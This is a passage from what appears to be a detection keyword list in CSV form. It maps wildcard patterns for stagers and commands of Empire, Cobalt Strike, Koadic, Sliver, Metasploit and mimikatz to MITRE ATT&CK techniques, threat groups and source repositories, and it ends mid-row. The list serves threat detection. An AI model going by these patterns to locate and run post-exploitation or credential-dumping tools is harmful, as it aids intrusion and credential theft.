-*Stage-gSharedInfoBitmap*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stageless payload*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*StageListenerCmd*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*stager/js/bitsadmin *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/disk*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/mshta*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/regsvr *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/rundll32_js *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager/js/wmic *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*stager_bind_pipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*stager_bind_pipe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*stager_bind_tcp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*stager_bind_tcp*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*stager_hidden_bind_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*stager_sock_find.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*stagers/*/aes.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/diffiehellman.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/get_sysinfo.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*stagers/*/rc4.py*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Stagers\ExeStager\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*Stagers\SvcStager\*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*stagerx64.bin*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*standard::answer*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::base64*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::cd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::cls*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::coffee*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::exit*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::hostname*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::localtime*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*standard::log*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 